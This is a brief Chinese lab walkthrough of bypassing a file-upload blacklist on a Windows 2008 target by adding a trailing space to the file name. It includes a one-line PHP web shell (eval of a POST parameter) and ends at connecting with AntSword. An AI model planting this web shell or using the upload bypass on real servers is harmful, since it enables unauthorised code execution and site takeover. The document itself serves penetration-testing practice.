一、相关知识
1、空格绕过原理:
Windows系统下,对于文件名中的空格作为空处理,程序中的检测代码却不能自动删除空格,从而绕过黑名单。针对此情况,应修改对应的文件名,添加空格。
二、环境搭配
攻击机: | kali | IP: | 192.168.0.112 |
靶机: | Windows2008 | IP: | 192.168.0.130:9006 |
三、文件上传
1、制作一句话木马
命令:<?php @eval($_POST['hacker']); ?>
2、设置代理
浏览器设置代理
Burpsuite设置代理
3、文件上传
在文件名后面添加空格
右键点击图片使用新标签打开图片,可以发现图片上传的路径。
四、蚁剑连接